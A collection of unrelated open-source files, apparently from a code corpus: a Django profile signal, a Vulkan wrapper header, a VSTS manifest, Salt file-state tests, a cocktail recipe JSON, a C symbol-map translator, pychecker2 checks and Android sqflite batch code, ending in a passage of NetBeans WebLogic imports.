def create_user_profile(sender, instance, created, **kwargs):
    # post_save receiver: create the matching Profile exactly once, on the
    # initial insert of a User row (`created` is False for updates).
    if created:
        Profile.objects.create(user=instance)


post_save.connect(create_user_profile, sender=User)
# Create your models here.
| 387 |
589 | //
// Copyright (c) 2019 Advanced Micro Devices, Inc. All rights reserved.
//
// Permission is hereby granted, free of charge, to any person obtaining a copy
// of this software and associated documentation files (the "Software"), to deal
// in the Software without restriction, including without limitation the rights
// to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
// copies of the Software, and to permit persons to whom the Software is
// furnished to do so, subject to the following conditions:
//
// The above copyright notice and this permission notice shall be included in
// all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
// IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
// FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
// AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
// LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
// OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
// THE SOFTWARE.
//
#ifndef MISC_RENDERING_SURFACE_CREATE_INFO_H
#define MISC_RENDERING_SURFACE_CREATE_INFO_H
#include "misc/types.h"
namespace Anvil
{
    /** Parameter object describing how a rendering surface should be created.
     *
     *  Pure data holder: getters and setters only, no validation is performed
     *  here.
     */
    class RenderingSurfaceCreateInfo
    {
    public:
        /* Creates a new rendering surface create info instance. */
        static RenderingSurfaceCreateInfoUniquePtr create(Anvil::Instance*         in_instance_ptr,
                                                          const Anvil::BaseDevice* in_device_ptr,
                                                          const Anvil::Window*     in_window_ptr,
                                                          MTSafety                 in_mt_safety = Anvil::MTSafety::INHERIT_FROM_PARENT_DEVICE);

        ~RenderingSurfaceCreateInfo();

        /** Device the surface will be created for. */
        const Anvil::BaseDevice* get_device_ptr() const
        {
            return m_device_ptr;
        }

        /** Multi-threading safety behavior requested for the surface. */
        const MTSafety& get_mt_safety() const
        {
            return m_mt_safety;
        }

        /** Vulkan instance the surface will be created against. */
        Anvil::Instance* get_instance_ptr() const
        {
            return m_instance_ptr;
        }

        /** Window the surface will present to. */
        const Anvil::Window* get_window_ptr() const
        {
            return m_window_ptr;
        }

        void set_device_ptr(const Anvil::BaseDevice* in_device_ptr)
        {
            m_device_ptr = in_device_ptr;
        }

        void set_mt_safety(const MTSafety& in_mt_safety)
        {
            m_mt_safety = in_mt_safety;
        }

        void set_instance_ptr(Anvil::Instance* in_instance_ptr)
        {
            m_instance_ptr = in_instance_ptr;
        }

        void set_window_ptr(const Anvil::Window* in_window_ptr)
        {
            m_window_ptr = in_window_ptr;
        }

    private:
        /* Private type definitions */

        /* Private functions */

        RenderingSurfaceCreateInfo(Anvil::Instance*         in_instance_ptr,
                                   const Anvil::BaseDevice* in_device_ptr,
                                   const Anvil::Window*     in_window_ptr,
                                   MTSafety                 in_mt_safety);

        /* Private variables */
        const Anvil::BaseDevice* m_device_ptr;
        Anvil::Instance*         m_instance_ptr;
        const Anvil::Window*     m_window_ptr;

        MTSafety m_mt_safety;
    };
};
#endif /* MISC_RENDERING_SURFACE_CREATE_INFO_H */
| 1,564 |
631 | {
"manifestVersion": 1.0,
"id": "vss-services-beatpulse-gate",
"name": "Xabaril BeatPulse Release Gate",
"publisher": "luisfraile",
"version": "1.0.1",
"public": true,
"description": "VSTS BeatPulse extensions.",
"categories": ["Build and release"],
"Tags": ["BeatPulse",
"Liveness",
"Release",
"ReleaseGates",
"DevOps"],
"targets": [{
"id": "Microsoft.VisualStudio.Services.Cloud"
}],
"demands": [],
"icons": {
"default": "images/xabaril.png"
},
"branding": {
"color": "#3B3E43",
"theme": "dark"
},
"screenshots": [{
"path": "images/XabarilSample.png"
}],
"files": [
{
"path": "BeatPulseGate"
},
{
"path": "images/xabaril.png",
"addressable": true
},
{
"path": "images/XabarilSample.png",
"addressable": true
}],
"content": {
"details": {
"path": "readme.md"
}
},
"links": {
"license": {
"uri": "https://github.com/Xabaril/Xabaril/blob/master/LICENSE"
}
},
"contributions": [{
"id": "xabaril-beatpulse-gate-task",
"type": "ms.vss-distributed-task.task",
"targets": ["ms.vss-distributed-task.tasks"],
"properties": {
"name": "BeatPulseGate"
}
}]
} | 536 |
9,425 | <gh_stars>1000+
import logging
import os
import pytest
import salt.serializers.json as jsonserializer
import salt.serializers.msgpack as msgpackserializer
import salt.serializers.plist as plistserializer
import salt.serializers.python as pythonserializer
import salt.serializers.yaml as yamlserializer
import salt.states.file as filestate
from salt.exceptions import CommandExecutionError
from tests.support.mock import MagicMock, patch
log = logging.getLogger(__name__)
@pytest.fixture
def configure_loader_modules():
    # Provide the dunder context salt.states.file expects when loaded by the
    # salt loader: opts, minimal __salt__, and the serializer registry.
    return {
        filestate: {
            "__env__": "base",
            "__salt__": {"file.manage_file": False},
            "__serializers__": {
                "yaml.serialize": yamlserializer.serialize,
                # NOTE(review): "yaml.seserialize" looks like a typo of
                # "yaml.deserialize"/"yaml.serialize" -- kept as-is to match
                # the registered key; confirm against the states under test.
                "yaml.seserialize": yamlserializer.serialize,
                "python.serialize": pythonserializer.serialize,
                "json.serialize": jsonserializer.serialize,
                "plist.serialize": plistserializer.serialize,
                "msgpack.serialize": msgpackserializer.serialize,
            },
            "__opts__": {"test": False, "cachedir": ""},
            "__instance_id__": "",
            "__low__": {},
            "__utils__": {},
        }
    }
# 'absent' function tests: 1
def test_absent():
    """
    Test to make sure that the named file or directory is absent.
    """
    name = "/fake/file.conf"

    ret = {"name": name, "result": False, "comment": "", "changes": {}}

    mock_t = MagicMock(return_value=True)
    mock_f = MagicMock(return_value=False)
    # side_effect lists: first call succeeds, second call raises.
    mock_file = MagicMock(side_effect=[True, CommandExecutionError])
    mock_tree = MagicMock(side_effect=[True, OSError])

    # Empty name must be rejected.
    comt = "Must provide name to file.absent"
    ret.update({"comment": comt, "name": ""})

    with patch.object(os.path, "islink", MagicMock(return_value=False)):
        assert filestate.absent("") == ret

        # Relative paths must be rejected.
        with patch.object(os.path, "isabs", mock_f):
            comt = "Specified file {} is not an absolute path".format(name)
            ret.update({"comment": comt, "name": name})
            assert filestate.absent(name) == ret

        # Removing "/" must be refused outright.
        with patch.object(os.path, "isabs", mock_t):
            comt = 'Refusing to make "/" absent'
            ret.update({"comment": comt, "name": "/"})
            assert filestate.absent("/") == ret

        # Regular-file cases: test mode, successful removal, then the
        # CommandExecutionError raised by the second mock_file call.
        with patch.object(os.path, "isfile", mock_t):
            with patch.dict(filestate.__opts__, {"test": True}):
                comt = "File {} is set for removal".format(name)
                ret.update(
                    {
                        "comment": comt,
                        "name": name,
                        "result": None,
                        "changes": {"removed": "/fake/file.conf"},
                    }
                )
                assert filestate.absent(name) == ret

            with patch.dict(filestate.__opts__, {"test": False}):
                with patch.dict(filestate.__salt__, {"file.remove": mock_file}):
                    comt = "Removed file {}".format(name)
                    ret.update(
                        {"comment": comt, "result": True, "changes": {"removed": name}}
                    )
                    assert filestate.absent(name) == ret

                    # Second call hits the CommandExecutionError side effect.
                    comt = "Removed file {}".format(name)
                    ret.update({"comment": "", "result": False, "changes": {}})
                    assert filestate.absent(name) == ret

        # Directory cases: test mode, successful removal, then the OSError
        # raised by the second mock_tree call.
        with patch.object(os.path, "isfile", mock_f):
            with patch.object(os.path, "isdir", mock_t):
                with patch.dict(filestate.__opts__, {"test": True}):
                    comt = "Directory {} is set for removal".format(name)
                    ret.update(
                        {"comment": comt, "changes": {"removed": name}, "result": None}
                    )
                    assert filestate.absent(name) == ret

                with patch.dict(filestate.__opts__, {"test": False}):
                    with patch.dict(filestate.__salt__, {"file.remove": mock_tree}):
                        comt = "Removed directory {}".format(name)
                        ret.update(
                            {
                                "comment": comt,
                                "result": True,
                                "changes": {"removed": name},
                            }
                        )
                        assert filestate.absent(name) == ret

                        # Second call hits the OSError side effect.
                        comt = "Failed to remove directory {}".format(name)
                        ret.update({"comment": comt, "result": False, "changes": {}})
                        assert filestate.absent(name) == ret

            # Neither file nor directory: nothing to do.
            with patch.object(os.path, "isdir", mock_f):
                with patch.dict(filestate.__opts__, {"test": True}):
                    comt = "File {} is not present".format(name)
                    ret.update({"comment": comt, "result": True})
                    assert filestate.absent(name) == ret
| 2,540 |
310 | {
"name": "<NAME>",
"description": "The Jammy Dodger is the best-tasting shot that will ever grace your mouth. You won't be grimacing when you knock this one back!",
"github": "CalumChamberlain",
"ingredients": [
{
"quantity": "3 quarters",
"measure": "shot",
"ingredient": "Chambord (blackberry liquor)"
},
{
"quantity": "1 quarter",
"measure": "shot",
"ingredient": "double cream"
},
{
"quantity": "half",
"measure": "tsp",
"ingredient": "sugar"
}
],
"directions": [
"Fill the shot glass 3 quarters full with Chambord",
"Top up the shot with cream",
"Sprinkle a little sugar on top, knock it back and enjoy!"
],
"image": "jammy-dodger-shot.jpg",
"keywords": [
"blackberry liqueur",
"sugar",
"shot",
"blackberry"
]
}
| 479 |
504 | #include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*
 * Translate a linker map listing (read from the file named by argv[1]) into
 * symbol table lines: "C seg ofs label" for procedures, "D seg ofs label"
 * for variables, with protocol lines echoed as comments.
 *
 * Fixes: the map file argument and fopen() result were used unchecked
 * (crashing when no argument was given or the file did not exist), and the
 * getline() buffer and the FILE handle were never released.
 */
int main(int argc,char *argv[])
{
    char *buf = NULL;
    char *p,*label,*proc;
    size_t len = 0;
    unsigned short seg,seg_valid;
    unsigned short ofs;
    int nread = 0;
    FILE *f;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <mapfile>\n", argv[0]);
        return 1;
    }
    f = fopen(argv[1], "r");
    if (f == NULL) {
        perror(argv[1]);
        return 1;
    }

    seg=0;        // No segment read yet
    seg_valid=0;

    while((nread = getline(&buf,&len,f)) != -1)
    {
        if(strncmp(buf,"Segment ",8)==0)
        {
            /* Only public/resource/lmem segments get symbol entries. */
            if(strstr(buf,"type public") || strstr(buf,"type resource") ||
               strstr(buf,"type lmem"))
            {
                seg++;
                seg_valid=seg;
            }
            else
                seg_valid=0;
        }
        else if(strncmp(buf,"protocol:",9)==0)
        {
            strtok(buf,"\n");
            printf("; %s\n", buf);
        }
        else
        {
            label=strtok(buf," : ");
            p = strtok(NULL, "\n");
            if (p == NULL) continue;

            /* translate procedure entries */
            proc=strstr(p,"procedure at ");
            if(seg_valid && proc)
            {
                ofs=(unsigned)strtol(proc+13,&p,16);
                printf("C %u %x %s\n",seg_valid,ofs,label);
            }

            /* translate variable entries */
            proc=strstr(p,"variable at ");
            if(seg_valid && proc)
            {
                ofs=(unsigned)strtol(proc+12,&p,16);
                printf("D %u %x %s\n",seg_valid,ofs,label);
            }
        }
        fflush(stdout);
    }

    free(buf);   // getline() buffer
    fclose(f);
    return 0; // no error
}
| 1,087 |
class InvokeDynamicTest
{
    // Functional interface implemented below via a lambda (invokedynamic).
    interface InterfaceTest
    {
        public String callee(String name);
    }

    public static void main(String[] args)
    {
        // Expression-bodied lambda; prints "Hello World!".
        InterfaceTest greeter = suffix -> "Hello" + suffix;
        System.out.println(greeter.callee(" World!"));
    }
}
450 | from pychecker2.Check import Check
from pychecker2.Check import Warning
from pychecker2 import symbols
from pychecker2.util import *
from compiler.misc import mangle
from compiler import ast, walk
_ignorable = {}
for ignore in ['repr', 'dict', 'class', 'doc', 'str']:
_ignorable['__%s__' % ignore] = 1
class GetDefs(BaseVisitor):
    """Collect assignments to attributes of `self` (definitions).

    `result` maps attribute name -> defining AST node.
    """

    def __init__(self, name):
        self.selfname = name
        self.result = {}

    def visitAssAttr(self, node):
        expr = node.expr
        targets_self = isinstance(expr, ast.Name) and expr.name == self.selfname
        if targets_self and isinstance(node.parent, (ast.Assign, ast.AssTuple)):
            self.result[node.attrname] = node

    def visitClass(self, node):
        # nested classes are deliberately not descended into
        pass
class GetRefs(BaseVisitor):
    """Collect non-definition uses of attributes of `self` (references).

    `result` maps attribute name -> referencing AST node.
    """

    def __init__(self, name):
        self.selfname = name
        self.result = {}

    def _is_self(self, expr):
        # True when `expr` is the bare name bound to self in this method.
        return isinstance(expr, ast.Name) and expr.name == self.selfname

    def visitAssAttr(self, node):
        if self._is_self(node.expr) and \
           not isinstance(node.parent, (ast.Assign, ast.AssTuple)):
            self.result[node.attrname] = node
        self.visitChildren(node)

    def visitGetattr(self, node):
        if self._is_self(node.expr):
            self.result[node.attrname] = node
        self.visitChildren(node)

    def visitClass(self, node):
        # nested classes are deliberately not descended into
        pass
def _get_methods(class_scope):
    # A class's methods are exactly its FunctionScope children.
    return type_filter(class_scope.get_children(), symbols.FunctionScope)
class NotSimpleName(Exception):
    """Raised when an expression is not a plain dotted name."""
    pass

# compress Getattr(Getattr(Name(x), y), z) -> "x.y.z"
def get_name(node):
    """Flatten nested Getattr/Name nodes into a tuple of name parts."""
    if isinstance(node, ast.Name):
        return (node.name,)
    if isinstance(node, ast.Getattr):
        return get_name(node.expr) + (node.attrname,)
    raise NotSimpleName
def get_base_names(scope):
    """Return dotted-name tuples for the base-class expressions of a class scope."""
    names = []
    for base in scope.node.bases:
        try:
            names.append(get_name(base))
        except NotSimpleName:
            # FIXME: base classes given by arbitrary expressions are hidden
            pass
    return names
def find_in_module(package, remotename, names, checker):
    """Resolve `names` relative to module object `package`.

    `remotename` is the name under which the object was imported from
    `package` (or None).  Returns a scope object, or None if the name
    cannot be resolved.
    """
    # No other names, must be a name from the module
    if not names:
        f = checker.check_module(package)
        if f:
            return find_scope_going_down(f.root_scope, [remotename], checker)
        return None

    # complex name lookup
    try:
        # first, get the real name of the package
        name = package.__name__
        module = __import__(name, globals(), {}, [''])
    except AttributeError:
        # ok, so its a fake module... go with that
        # NOTE(review): `name` stays unbound on this path; the
        # `name += "." + remotename` below would then raise NameError --
        # presumably remotename is always falsy for fake modules; confirm.
        module = package
    if remotename:
        name += "." + remotename
    # now import it, and chase down any other modules
    submodule = getattr(module, names[0], None)
    if type(submodule) == type(symbols):
        # the attribute is itself a module: recurse into it
        return find_in_module(submodule, None, names[1:], checker)

    # object in the module is not another module, so chase down the source
    f = checker.check_module(submodule)
    if f:
        return find_scope_going_down(f.root_scope, names, checker)
    return None
def find_scope_going_down(scope, names, checker):
    "Drill down scopes to find definition of x.y.z"
    for child in scope.get_children():
        if getattr(child, 'name', '') != names[0]:
            continue
        if len(names) == 1:
            return child
        return find_scope_going_down(child, names[1:], checker)
    # Not defined here, check for import
    return find_imported_class(scope.imports, names, checker)
def find_imported_class(imports, names, checker):
    """Resolve a dotted name against an `imports` mapping.

    Tries progressively longer prefixes of `names` as the imported name
    ("x", then "x.y", ...) and resolves the remainder inside the imported
    module.  Returns a scope object or None.
    """
    # may be defined by import
    for i in range(1, len(names) + 1):
        # try x, then x.y, then x.y.z as imported names
        try:
            name = ".".join(names[:i])
            ref = imports[name]
            # now look for the rest of the name
            result = find_in_module(ref.module, ref.remotename, names[i:], checker)
            if result:
                return result
        except (KeyError, ImportError):
            # prefix not imported (or import failed): try the next prefix
            pass
    return None
def find_scope_going_up(scope, names, checker):
    "Search up to find scope defining x of x.y.z"
    for p in parents(scope):
        if p.defs.has_key(names[0]):
            return find_scope_going_down(p, names, checker)
        # name imported via 'from module import *'
        try:
            return find_in_module(p.imports[names[0]].module, None, names, checker)
        except KeyError:
            # NOTE(review): returning None here ends the search after the
            # first parent scope; presumably the walk was meant to continue
            # upwards to enclosing scopes -- confirm intended behavior.
            return None
def get_base_classes(scope, checker):
    """Collect the scopes of all transitively resolvable base classes."""
    bases = []
    for name in get_base_names(scope):
        found = find_scope_going_up(scope, name, checker)
        if found:
            bases.append(found)
            bases.extend(get_base_classes(found, checker))
    return bases
def conformsTo(a, b):
    """Return a truthy value if method scope `a` conforms to base method `b`.

    Conformance compares argument counts and the presence of *args/**kw.
    Returns 1/True on conformance, None/False otherwise (callers only test
    truthiness).
    """
    alen = len(a.node.argnames)
    blen = len(b.node.argnames)
    # f(a, *args, **kw) conforms to f(a, b, *args, **kw)
    # f(a, *args) conforms to f(a, b, *args)
    # f(a, *args) conforms to f(a, b, c)
    # f(a, b, c, *args) does not conform to f(a, b)
    if alen == blen:
        if a.node.kwargs == b.node.kwargs and a.node.varargs == b.node.varargs:
            return 1
    if a.node.varargs and alen - 1 <= blen:
        return a.node.kwargs == b.node.kwargs
    return None
class AttributeCheck(Check):
    "check `self.attr' expressions for attr"

    unknownAttribute = Warning('Report unknown object attributes in methods',
                               'Class %s has no attribute %s')
    unusedAttribute = Warning('Report attributes unused in methods',
                              'Attribute %s is not used in class %s')
    methodRedefined = Warning('Report the redefinition of class methods',
                              'Method %s in class %s redefined')
    signatureChanged = Warning('Report methods whose signatures do not '
                               'match base class methods',
                               'Signature does not match method '
                               '%s in base class %s')
    attributeInitialized = \
        Warning('Report attributes not initialized in __init__',
                'Attribute %s is not initialized in __init__')

    def check(self, file, checker):
        def visit_with_self(Visitor, method):
            # Run Visitor over the method body, telling it the name the
            # instance is bound to (the method's first argument).
            if not method.node.argnames:
                return {}
            return walk(method.node, Visitor(method.node.argnames[0])).result

        # for all class scopes
        for node, scope in file.class_scopes():
            init_attributes = None  # attributes initialized in __init__
            attributes = {}         # "self.foo = ..." assignments -> nodes
            methods = {}            # mangled method name -> method scope

            # get attributes defined on self
            for m in _get_methods(scope):
                defs = visit_with_self(GetDefs, m)
                if m.name == '__init__':
                    init_attributes = defs
                attributes.update(defs)
                methods[mangle(m.name, scope.name)] = m

            # complain about attributes not initialized in __init__
            if init_attributes is not None:
                for name, node in dict_minus(attributes, init_attributes).items():
                    file.warning(node, self.attributeInitialized, name)

            # collect inherited methods/attributes and check that
            # overriding methods conform to the base-class signature
            inherited_methods = scope.defs.copy()
            inherited_attributes = attributes.copy()
            for base in get_base_classes(scope, checker):
                for m in _get_methods(base):
                    inherited_attributes.update(visit_with_self(GetDefs, m))
                    mname = mangle(m.name, base.name)
                    # `in` replaces the Python-2-only dict.has_key()
                    if m.name != "__init__" and \
                       mname in methods and \
                       not conformsTo(methods[mname], m):
                        file.warning(methods[mname].node,
                                     self.signatureChanged, m.name, base.name)
                    else:
                        methods[mname] = m
                inherited_methods.update(base.defs)

            # complain about attributes with the same name as methods
            both = dict_intersect(attributes, inherited_methods)
            for name, node in both.items():
                file.warning(node, self.methodRedefined, name, scope.name)

            # find refs on self
            refs = {}
            for m in _get_methods(scope):
                refs.update(visit_with_self(GetRefs, m))

            # Now complain about refs on self that aren't known: not a
            # method, not ignorable, not a class-level def, not an attribute
            unknown = dict_minus(refs, inherited_methods)
            unknown = dict_minus(unknown, _ignorable)
            unknown = dict_minus(unknown, scope.defs)
            unknown = dict_minus(unknown, inherited_attributes)
            for name, node in unknown.items():
                file.warning(node, self.unknownAttribute, scope.name, name)

            # only '__'-prefixed attributes are reported as unused —
            # presumably because public ones may be used from outside
            # the class (TODO confirm)
            unused = dict_minus(attributes, refs)
            for name, node in unused.items():
                if name.startswith('__'):
                    file.warning(node, self.unusedAttribute, name, scope.name)
class GetReturns(BaseVisitor):
    # Collects the Return nodes of one code body.  Nested function and
    # class definitions are deliberately not descended into, so their
    # returns are not attributed to the outer body.

    def __init__(self):
        self.result = []    # Return nodes found, in visit order

    def visitReturn(self, node):
        self.result.append(node)

    # stop traversal at nested scopes
    def visitFunction(self, node): pass
    visitClass = visitFunction
class InitCheck(Check):
    # Flags __init__ methods that return a value (anything other than
    # an explicit or implicit None).

    initReturnsValue = Warning('Report value returned from __init__',
                               'Method __init__ should not return a value')

    def check(self, file, unused_checker):
        for node, scope in file.class_scopes():
            for m in _get_methods(scope):
                if m.name == '__init__':
                    for r in walk(m.node.code, GetReturns()).result:
                        # 'return None' as a literal constant is fine
                        if isinstance(r.value, ast.Const) and \
                           r.value.value is None:
                            continue
                        # so is 'return None' spelled as a name
                        if isinstance(r.value, ast.Name) and \
                           r.value.name == 'None':
                            continue
                        file.warning(r, self.initReturnsValue)
# Expected number of arguments (including self) for each special method.
# A value of None means the argument count is not checked (e.g. __new__
# and __call__ accept any number).  Used by check_special() below.
# (The original dict listed '__len__' and '__delitem__' twice; the
# duplicates are removed here — the resulting dict is identical.)
special = {
    '__cmp__': 2, '__del__': 1, '__delitem__': 2, '__eq__': 2,
    '__ge__': 2, '__getitem__': 2, '__gt__': 2, '__hash__': 1,
    '__le__': 2, '__len__': 1, '__lt__': 2, '__ne__': 2,
    '__nonzero__': 1, '__repr__': 1, '__setitem__': 3, '__str__': 1,
    '__getattr__': 2, '__setattr__': 3,
    '__delattr__': 2, '__iter__': 1,
    '__contains__': 2, '__setslice__': 4, '__delslice__': 3,
    '__add__': 2, '__sub__': 2, '__mul__': 2, '__floordiv__': 2,
    '__mod__': 2, '__divmod__': 2, '__lshift__': 2,
    '__rshift__': 2, '__and__': 2, '__xor__': 2, '__or__': 2,
    '__div__': 2, '__truediv__': 2, '__radd__': 2, '__rsub__': 2,
    '__rmul__': 2, '__rdiv__': 2, '__rmod__': 2, '__rdivmod__': 2,
    '__rpow__': 2, '__rlshift__': 2, '__rrshift__': 2, '__rand__': 2,
    '__rxor__': 2, '__ror__': 2, '__iadd__': 2, '__isub__': 2,
    '__imul__': 2, '__idiv__': 2, '__imod__': 2, '__ilshift__': 2,
    '__irshift__': 2, '__iand__': 2, '__ixor__': 2, '__ior__': 2,
    '__neg__': 1, '__pos__': 1, '__abs__': 1, '__invert__': 1,
    '__complex__': 1, '__int__': 1, '__long__': 1, '__float__': 1,
    '__oct__': 1, '__hex__': 1, '__coerce__': 2,
    '__new__': None,
    '__getinitargs__': 1, '__reduce__': 1,
    '__getstate__': 1, '__setstate__': 2,
    '__copy__': 1, '__deepcopy__': 1,
    '__pow__': 2, '__ipow__': 2,  # 2 or 3
    '__call__': None,  # any number > 1
    '__getslice__': 3,  # deprecated
    '__getattribute__': 2,
    }
def check_special(scope):
    # If `scope` is a known special method whose declared signature does
    # not fit the expected argument count (or uses *args/**kwargs),
    # return the expected count; otherwise return None.
    try:
        expected = special[scope.name]
    except KeyError:
        return None  # not a recognized special method
    most = len(scope.node.argnames)
    least = most - len(scope.node.defaults)
    if least > expected or most < expected or \
       scope.node.varargs or scope.node.kwargs:
        return expected
    return None
class SpecialCheck(Check):
    # Warns about special methods declared with the wrong number of
    # arguments, and about '__x__'-style method names that are not
    # actually special methods.

    specialMethod = Warning('Report special methods with incorrect '
                            'number of arguments',
                            'The %s method requires %d argument%s, '
                            'including self')

    notSpecial = Warning('Report methods with "__" prefix and suffix '
                         'which are not defined as special methods',
                         'The method %s is not a special method, '
                         'but is reserved.')

    def check(self, file, unused_checker):
        for node, scope in file.class_scopes():
            for m in _get_methods(scope):
                n = check_special(m)
                if n:
                    file.warning(m.node, self.specialMethod, m.name, n,
                                 n > 1 and "s" or "")
                name = m.name
                # `in` replaces the Python-2-only dict.has_key()
                if name.startswith('__') and name.endswith('__') and \
                   name != '__init__' and name not in special:
                    file.warning(m.node, self.notSpecial, name)
class BackQuote(BaseVisitor):
    # Collects backquote (repr) expressions applied directly to the
    # instance name of the enclosing method.

    def __init__(self, selfname):
        # name the instance is bound to (usually 'self')
        self.selfname = selfname
        self.results = []

    def visitBackquote(self, node):
        target = node.expr
        if isinstance(target, ast.Name) and target.name == self.selfname:
            self.results.append(node)
class ReprCheck(Check):
    # Flags backquote (repr) expressions applied to self inside
    # __repr__ methods.

    backquoteSelf = Warning('Report use of `self` in __repr__ methods',
                            'Using `self` in __repr__')

    def check(self, file, unused_checker):
        for node, scope in file.class_scopes():
            for m in _get_methods(scope):
                # need at least one argument to know the 'self' name
                if m.name == '__repr__' and m.node.argnames:
                    visitor = BackQuote(m.node.argnames[0])
                    for n in walk(m.node.code, visitor).results:
                        file.warning(n, self.backquoteSelf)
| 6,881 |
1,676 | package sdk.chat.core.handlers;
import java.util.Map;
import io.reactivex.Completable;
import sdk.chat.core.dao.Message;
import sdk.chat.core.push.BroadcastHandler;
/**
* Created by SimonSmiley-Andrews on 01/05/2017.
*/
public interface PushHandler {

    /** Subscribe this device/user to push notifications for the given channel. */
    Completable subscribeToPushChannel(String channel);

    /** Unsubscribe this device/user from the given push channel. */
    Completable unsubscribeToPushChannel(String channel);

    // Build the push payload for a chat message; the exact keys depend
    // on the concrete implementation (TODO confirm with implementations).
    Map<String, Object> pushDataForMessage(Message message);

    /** Send a push notification with the given payload. */
    void sendPushNotification (Map<String, Object> data);

    /** Handler used to process incoming push broadcasts. */
    BroadcastHandler getBroadcastHandler();

    void setBroadcastHandler(BroadcastHandler broadcastHandler);

    /** Whether push handling is enabled for this installation. */
    boolean enabled();
}
| 196 |
2,483 | <filename>sqflite/android/src/main/java/com/tekartik/sqflite/operation/BatchOperation.java
package com.tekartik.sqflite.operation;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import io.flutter.plugin.common.MethodChannel;
import static com.tekartik.sqflite.Constant.PARAM_ERROR;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_CODE;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_DATA;
import static com.tekartik.sqflite.Constant.PARAM_ERROR_MESSAGE;
import static com.tekartik.sqflite.Constant.PARAM_METHOD;
import static com.tekartik.sqflite.Constant.PARAM_RESULT;
/**
* Created by alex on 09/01/18.
*/
public class BatchOperation extends BaseOperation {
    // Raw description of one operation in the batch, as received from
    // Dart: contains the method name (PARAM_METHOD) and its arguments.
    final Map<String, Object> map;
    // Records the outcome (success value or error) of executing this operation.
    final BatchOperationResult operationResult = new BatchOperationResult();
    // When true, the caller asked for no per-operation results to be reported.
    final boolean noResult;

    /**
     * OperationResult implementation that simply stores the outcome so it
     * can later be turned into an entry of the batch response.
     */
    public class BatchOperationResult implements OperationResult {
        // success
        Object result;

        // error
        String errorCode;
        String errorMessage;
        Object errorData;

        @Override
        public void success(Object result) {
            this.result = result;
        }

        @Override
        public void error(String errorCode, String errorMessage, Object data) {
            this.errorCode = errorCode;
            this.errorMessage = errorMessage;
            this.errorData = data;
        }
    }

    public BatchOperation(Map<String, Object> map, boolean noResult) {
        this.map = map;
        this.noResult = noResult;
    }

    /** @return the method name stored under PARAM_METHOD. */
    @Override
    public String getMethod() {
        return (String) map.get(PARAM_METHOD);
    }

    /** @return the raw argument stored under {@code key}, cast to the caller's type. */
    @SuppressWarnings("unchecked")
    @Override
    public <T> T getArgument(String key) {
        return (T) map.get(key);
    }

    @Override
    public OperationResult getOperationResult() {
        return operationResult;
    }

    /** @return a {PARAM_RESULT: value} map describing a successful operation. */
    public Map<String, Object> getOperationSuccessResult() {
        Map<String, Object> results = new HashMap<>();
        results.put(PARAM_RESULT, operationResult.result);
        return results;
    }

    /** @return a {PARAM_ERROR: {code, message, data}} map describing a failed operation. */
    public Map<String, Object> getOperationError() {
        Map<String, Object> error = new HashMap<>();
        Map<String, Object> errorDetail = new HashMap<>();
        errorDetail.put(PARAM_ERROR_CODE, operationResult.errorCode);
        errorDetail.put(PARAM_ERROR_MESSAGE, operationResult.errorMessage);
        errorDetail.put(PARAM_ERROR_DATA, operationResult.errorData);
        error.put(PARAM_ERROR, errorDetail);
        return error;
    }

    // Forward the recorded error directly to the Flutter method-channel result.
    public void handleError(MethodChannel.Result result) {
        result.error(this.operationResult.errorCode, this.operationResult.errorMessage, this.operationResult.errorData);
    }

    @Override
    public boolean getNoResult() {
        return noResult;
    }

    // Append this operation's success entry unless results are suppressed.
    public void handleSuccess(List<Map<String, Object>> results) {
        if (!getNoResult()) {
            results.add(getOperationSuccessResult());
        }
    }

    // Record the error entry but allow the batch to continue.
    public void handleErrorContinue(List<Map<String, Object>> results) {
        if (!getNoResult()) {
            results.add(getOperationError());
        }
    }
}
| 1,226 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.j2ee.weblogic9.optional;
import java.io.IOException;
import java.util.HashMap;
import java.util.HashSet;
import java.util.Map;
import java.util.Set;
import java.util.logging.Level;
import java.util.logging.Logger;
import javax.enterprise.deploy.shared.StateType;
import javax.enterprise.deploy.spi.Target;
import javax.enterprise.deploy.spi.status.ProgressObject;
import org.netbeans.api.extexecution.base.BaseExecutionDescriptor;
import org.netbeans.api.extexecution.base.input.InputProcessor;
import org.netbeans.api.extexecution.startup.StartupExtender;
import org.netbeans.modules.j2ee.deployment.plugins.api.CommonServerBridge;
import org.netbeans.modules.j2ee.deployment.plugins.api.InstanceProperties;
import org.netbeans.modules.j2ee.deployment.plugins.api.ServerDebugInfo;
import org.netbeans.modules.j2ee.deployment.plugins.api.UISupport;
import org.netbeans.modules.j2ee.deployment.plugins.spi.StartServer;
import org.netbeans.modules.j2ee.deployment.profiler.api.ProfilerSupport;
import org.netbeans.modules.j2ee.weblogic9.deploy.WLDeploymentManager;
import org.netbeans.modules.j2ee.weblogic9.WLPluginProperties;
import org.netbeans.modules.weblogic.common.api.RuntimeListener;
import org.netbeans.modules.weblogic.common.api.WebLogicRuntime;
import org.openide.util.NbBundle;
import org.openide.util.Utilities;
import org.openide.util.lookup.Lookups;
import org.openide.windows.InputOutput;
/**
*
* @author <NAME>
*/
